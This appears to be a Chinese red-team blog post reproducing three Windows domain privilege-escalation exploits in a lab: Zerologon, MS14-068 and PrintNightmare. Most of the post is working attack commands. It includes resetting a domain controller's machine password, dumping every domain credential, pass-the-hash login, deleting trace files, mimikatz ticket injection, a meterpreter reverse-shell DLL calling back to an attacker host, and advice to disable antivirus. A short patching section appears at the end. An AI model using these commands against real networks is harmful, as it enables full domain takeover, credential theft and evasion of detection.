域环境提权

NetLogon特权域控提权漏洞(CVE-2020-1472)

简介
CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。

只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为windows,

这个漏洞作用是将域控的机器账号密码置空,那么机器账号是啥呢?

MachineAccount 即机器账号、计算机账号,是每台计算机在安装系统后默认生成的帐户。所有加入域的也主机都会有一个机器用户,用户名为机器名加$,如:WIN7$WINXP$。我的理解是:机器账号对应计算机的system用户,属于服务账号的一种。

计算机帐户的密码存储在注册表中的位置为:

HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets\$machine.ACC
# 该注册表键路径只能在 SYSTEM 权限下访问

影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core
installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

漏洞复现

mpacket网络协议工具包:https://github.com/SecureAuthCorp/impacket/

域控IP:10.10.10.10
域内跳板IP:10.10.10.12
域:redteam.com

查看域控的主机名:

net group "domain controllers" /domain

在这里插入图片描述
首先检测漏洞是否存在:

C:\Users\saulgoodman>python Desktop/CVE-2020-1472-master/cve-2020-1472-exploit.py -n DC-2016 -t 10.10.10.10

在这里插入图片描述
返回 Success,说明漏洞存在!输入y将域控机器账号重置:

使用impacket中的secretsdump.py导出域内所有用户的凭证:(-no-pass前有四个空格)

python Desktop/secretsdump.py redteam.com/DC-2016$@10.10.10.10    -no-pass

在这里插入图片描述
得到了域控的 Hash:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4:::

然后再通过 wmic hash 传递:

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4 redteam.com/administrator@10.10.10.10

在这里插入图片描述
然后通过导出 sam system 等文件到本地,获取域控机器上本地保存之前的 hash 值用于
恢复,不然就脱域了:

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save

在这里插入图片描述
记得下载完后删除痕迹文件:

del /f system.save
del /f sam.save
del /f security.save

之后通过 sam.save、security.save、system.save 这些文件获得原来域控机器上的 Ntlm
Hash 值,用于恢复密码:

python .\secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

在这里插入图片描述

通过拿到 $MACHINE.ACC: 的值,然后进行恢复: 注意只有后半部分:

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:c9420e14cc58d6cc4cc669d6b5fb4a33
python reinstall_original_pw.py DC-2016 10.10.10.10 c9420e14cc58d6cc4cc669d6b5fb4a33

在这里插入图片描述
此时使用空密码去获取域内的所有用户的凭证已经不行了:

python Desktop/secretsdump.py redteam.com/DC-2016$@10.10.10.10    -no-pass

在这里插入图片描述

MS14-068域提权漏洞(Pass the Ticket)票据传递攻击

域控:10.1.1.2
域名:hacke.testlab

首先查看是否打了补丁
在这里插入图片描述

systeminfo | findstr KB3011780

MS14-068 利⽤⼯具:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

# 查看⽤户 SID
whoami /user

#⽤法:
MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>

# 实例
MS14-068.exe -u testuser@hacke.testlab -p test -s S-1-5-21-335331429-2309386428-4146539646-1105 -d 10.1.1.2

在这里插入图片描述

如上图,成功⽣成名为 TGT_testuser@hacke.testlab.ccache的票据⽂件。

在没有注⼊票据之前 dir 域控是拒绝访问的:
在这里插入图片描述
接下来要做的就是将该票据⽂件注⼊到win7的内存中,利⽤ mimikatz 将票据注⼊到当前内存中,伪造凭证:

mimikatz.exe
kerberos::purge //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
kerberos::list //查看当前机器凭证
kerberos::ptc TGT_testuser@hacke.testlab.ccache 票据⽂件 //将票据注⼊到内存中

在这里插入图片描述
虽然注入票据成功,但还是没能拿到域控shell,还是提示没权限
在这里插入图片描述
好像需要域控低于server2012才行,因为复现方法都一样,就不花时间再去搭建了,因为这个洞实战也没啥用。

Windows Print Spooler权限提升漏洞(CVE-2021-1675)

简介

Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中。

攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序,若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。

这个洞和域没关系

漏洞复现

域控:10.10.10.10
kali:10.10.10.133
域:redteam.com

1.kali上安装impacket

git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install


2.配置smb服务

vim /etc/samba/smb.conf
:dG 删除所有内容

按照如下代码修改

idmap config * : backend = tdb行前的分号去掉
在这里插入图片描述
然后加入整个smb内容即可

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes

3.重启smb服务

sudo service smbd start

4.生成dll和启动msf

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.133 LPORT=4444 -f dll -o /tmp/rever.dll
msfconsole
use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
run

5.下载exp

cd ~/
git clone https://github.com/cube0x0/CVE-2021-1675.git
cd CVE-2021-1675

6.利用漏洞

sudo python3 CVE-2021-1675.py 'redteam.com/herbert:saul!@#123@10.10.10.10' '\\10.10.10.133\smb\rever.dll'

虽然报错,但是成功获取了shell在这里插入图片描述

在这里插入图片描述7.迁移进程,漏洞利用成功后,该服务可能关闭

migrate -N explorer.exe

或者执行前先使用 set autorunscript -f 自动迁移到notepad

在这里插入图片描述
网上说只能利用一次,但是我这里测试好像没这限制

使用mimikatz攻击

mimikatz.exe
misc::printnightmare /server:10.10.10.10 /library:\\10.10.10.133\smb\rever.dll

漏洞修复
1、安装官方补丁

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675

2、临时防护措施:

1)在服务应用(services.msc)中找到Print Spooler服务。
2)停止运行服务,同时将“启动类型”修改为“禁用”。

PS:

1、关闭windows defender,或者做免杀
2、不要直接将配置文件替换为网站的,可能会导致kali无法启动

  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值